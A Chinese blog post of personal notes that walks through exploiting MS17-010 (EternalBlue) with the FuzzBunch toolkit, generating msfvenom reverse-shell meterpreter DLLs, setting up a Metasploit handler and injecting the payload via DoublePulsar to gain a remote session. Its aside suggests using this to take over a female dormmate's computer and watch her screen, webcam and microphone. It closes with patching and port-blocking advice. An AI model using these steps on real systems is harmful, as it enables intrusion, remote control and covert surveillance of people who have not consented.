微软EternalBlue永恒之蓝漏洞攻击测试
聲明:僅供學習交流使用,個人實驗筆記。排版比較懶。
微軟MS17-010
理論:SMBv1 漏洞攻擊,445端口。
環境準備:
攻擊資源:攻擊工具包 點我
攻擊者系統:Windows 7 Ultimate (x64) 點我
受害者系統:Windows 7 Ultimate (x64) 點我,winXP,win2008,win2003均可。 點我
輔助攻擊用系統:kali 點我
推薦虛擬環境構建工具:vmware workstation或oracle Vbox工具下載
操作:
1、攻擊者環境部署(確保路徑全英文):
虛擬機部署win7 64位環境,要么都橋接,要么都選擇自定義網絡。
下載python2.6并安裝點我
下載pywin32并安裝,一定要注意,下載對應python版本點我
將C:\Python26添加到環境變量PATH中。
將攻擊工具包拖入虛擬機,或上傳到虛擬機。解壓后,里面有個Windows的目錄,復制出來到虛擬機的c盤。
新建 listeningposts 目錄。
2、受害者環境部署:
受害者系統自選一個就行,隨意,安裝后,需要和攻擊者系統能互相ping通。
3、攻擊操作:
攻擊者在cmd下運行fb.py target IP就是受害者IP callbackIP就是攻擊者的IP USE redirection輸入NO base log 輸入 c:\logs或輸入NO(是否有日志記錄,這個是自愿) 接著輸入0,新建了一個攻擊項目。 項目名稱隨意(英文以外名字可能會報錯)。 然后輸入yes確認 其他的直接回車就行了。英文可以用有道翻譯。 use EternalBlue 問你是否要setting。輸入yes 下面的回車就好,都是默認好的配置。 target system,如實選擇受害者的系統。 mode選擇fb,即輸入1。 剩下的就是yes和回車了。 當出現success關鍵詞的時候,說明攻擊第一步已經完成了。 (失敗的原因: 1、防火墻的保護。 2、殺毒程序的保護。 3、網絡通信異常。 4、人為操作失誤。)部署輔助攻擊系統:
1、部署kali,可以和攻擊者正常通信即可。 2、攻擊者安裝xshell。 3、通過xshell ssh到kali即可。(百度關鍵詞,kali開啟和配置ssh服務) 4、利用kali 的msf生成后門文件。(LPORT端口參數隨意,只要不沖突就行) 如果受害者是winXP 32位: msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali系統的ip LPORT=19999 -f dll > /tmp/attack.dll 如果受害者是win7 64位: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=5555 -f dll > /tmp/attack.dll 確認xshell已經連接到了kali, 在xshell輸入:sz /opt/attack.dll 選擇保存在攻擊者系統的c盤根目錄下即可。 xshell下: msfconsole use exploit/multi/handler //啟用了監聽模塊 受害者是winXP的時候: ( set payload windows/meterpreter/reverse_tcp set LHOST kali的ip set LPORT 19999 show options //看一眼配置 run //開啟了監聽 ) 受害者是win7 64位時: ( msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set lhost kali的ip msf exploit(handler) > set lport 5555 msf exploit(handler) > exploit )在攻擊者的cmd下: use Doublepulsar 操作系統選擇目標的。 選擇RunDLL 路徑輸入:c:\attack.dll 其他各種回車確認。 可以看到,xshell連接的kali,收到了會話連接。 可以輸入whoami或者dir來驗證一下。其他資源(感覺部署環境好麻煩,想來點現成的):
在線現成的環境操作實戰:點我在線實戰
kali下直接實現攻擊利用:http://www.jianshu.com/p/f770d0bbed77
雜談
一般情況,女生的電腦如果和你在一個網絡,比如你們宿舍之間,沒有做嚴格的隔離,那么,理論上講,可以完整的控制她的電腦,除非她安裝了360,為何不說她安裝了騰訊管家。因為,對付一些漏洞,需要足夠的浪才可以,管家還是太文縐縐了。
(不僅可以截屏,還可以看攝像頭,還有錄音。另:現網實戰前,請閱讀:https://www.ishuo.cn/doc/mzlpnnqf.html)
預防和其他參考:
360提供了懶人模式的NSA攻擊自動檢測和防護工具,免安裝。點我
使用防火墻過濾/關閉 137、139、445端口。
對于 3389 遠程登錄,如果不想關閉的話,至少要關閉智能卡登錄功能。
安裝微軟補丁:請前往微軟官方網站下載與自己操作系統匹配的安全補丁進行更新
MS08-067:https://technet.microsoft.com/zh-cn/library/security/ms08-067.aspx
MS09-050:https://technet.microsoft.com/library/security/ms09-050
MS10-061:https://technet.microsoft.com/zh-cn/library/security/ms10-061.aspx
MS14-068:https://technet.microsoft.com/library/security/MS14-068
MS17-010:https://technet.microsoft.com/zh-cn/library/security/MS17-010
總結
以上是生活随笔為你收集整理的微软EternalBlue永恒之蓝漏洞攻击测试的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: C语言fopen函数的编程实现(可直接粘
- 下一篇: 志宇-分布式锁